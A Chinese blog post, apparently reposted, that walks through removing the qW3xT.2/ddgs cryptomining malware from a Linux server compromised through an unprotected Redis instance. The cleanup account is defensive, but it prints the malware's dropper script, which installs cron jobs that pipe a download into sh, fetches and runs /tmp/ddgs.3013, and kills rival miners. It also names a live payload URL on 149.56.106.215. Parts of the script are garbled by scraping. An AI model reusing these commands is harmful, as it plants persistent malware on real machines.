Linux 下qW3xT 2,解決挖礦病毒

2021-08-22 19:15:14 字數 2227 閱讀 3102

解決辦法:

1、首先解決redis入口問題,因為最開始沒有設定密碼,所以首先修改redis.conf。設定密碼,然後重啟redis

2、進入/tmp資料夾下。發現qw3xt.2檔案,刪除。之後kill掉qw3xt.2該程序,但是一段時間之後,發現該行程又重新啟動。

肯定是有守護程序,觀察top命令下的程序,發現乙個可疑的進行

3、在/tmp資料夾下發現該程序的檔案 ls /tmp

發現qw3xt.2檔案又重新生成了。這時,首先刪除qw3xt.2檔案和ddgs.3013檔案,然後使用top查詢qw3xt.2和ddgs.3013的pid,直接kill掉。

4、一段時間之後,刪除的檔案重新生成,dds和挖礦的程序又重新執行。此時懷疑是否有計畫任務,此時檢視計畫任務的列表

[root@izbp1cbg04oh74k1dexpujz tmp]# crontab -r //刪除計畫任務

此時計畫任務已經刪除。詳細資訊檢視

計畫任務刪除完成之後,這個13又開始執行。太頑固了。

於是我又看計畫任務的內容,是否是有東西沒有刪除乾淨。

[root@fantj tmp]# curl -fssl 


export path=$path:/bin:/usr/bin:/usr/local/bin:/usr/sbin


echo


"" > /var/spool/cron/root


echo


"*/15 * * * * curl -fssl  | sh" >> /var/spool/cron/root


mkdir -p /var/spool/cron/crontabs


echo


"" > /var/spool/cron/crontabs/root


echo


"*/15 * * * * curl -fssl  | sh" >> /var/spool/cron/crontabs/root


ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013


if [ ! -f "/tmp/ddgs.3013" ]; then


curl -fssl  -m) -o /tmp/ddgs.3013


fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013


ps auxf | grep -v grep | grep circle_mi | awk '' | xargs kill


ps auxf | grep -v grep | grep get.bi-chi.com | awk '' | xargs kill


ps auxf | grep -v grep | grep hashvault.pro | awk '' | xargs kill


ps auxf | grep -v grep | grep nanopool.org | awk '' | xargs kill


ps auxf | grep -v grep | grep minexmr.com | awk '' | xargs kill


ps auxf | grep -v grep | grep /boot/efi/ | awk '' | xargs kill


#ps auxf | grep -v grep | grep ddg.2006 | awk '' | kill


#ps auxf | grep -v grep | grep ddg.2010 | awk '' | kill


發現計畫任務在伺服器中建立了幾個檔案,


/var/spool/cron/crontabs/root


/var/spool/cron/root


內容是*/15 * * * * curl -fssl http:/


/149.56.106.215:8000/i.sh | sh。(與計畫任務相同)


將計畫任務中建立的檔案刪除。
最終,這個挖礦病毒終於刪除完

阿里雲伺服器被挖礦 qW3xT 2

阿里雲伺服器被挖礦,造成伺服器cup爆滿 解決 1 修改redis預設埠 2 用last檢視登入系統的使用者中是否有非自己建立的使用者,有就禁止其遠端登入 3 find nameqw3xt.2 查詢這個程序的檔案在 然後看看是不是有其他守護程序 我的守護程序是ddgs.3013 可通過ps aux ...

處理阿里雲伺服器異常程序qW3xT 2

因為最開始沒有設定密碼,所以首先修改redis.conf。設定密碼和redis預設埠 然後重啟redis whereis redis.conf vim redis.conf kill redis pid src redis server redis.conf 找到qw3xt.1和ddgs開頭的檔案,...

記一次 qW3xT 4,解決挖礦病毒。

最近感覺我的伺服器特別卡,開啟資料庫都半天,剛開始以為網咯不好也沒太在意。利用top命令 這時候問題出來了,最高cpu占用100 那我用啥?根據程序id 一看究竟,ps ef grep 程序id 1.cpu占用最多的前10個程序 ps auxw head 1 ps auxw sort rn k3 h...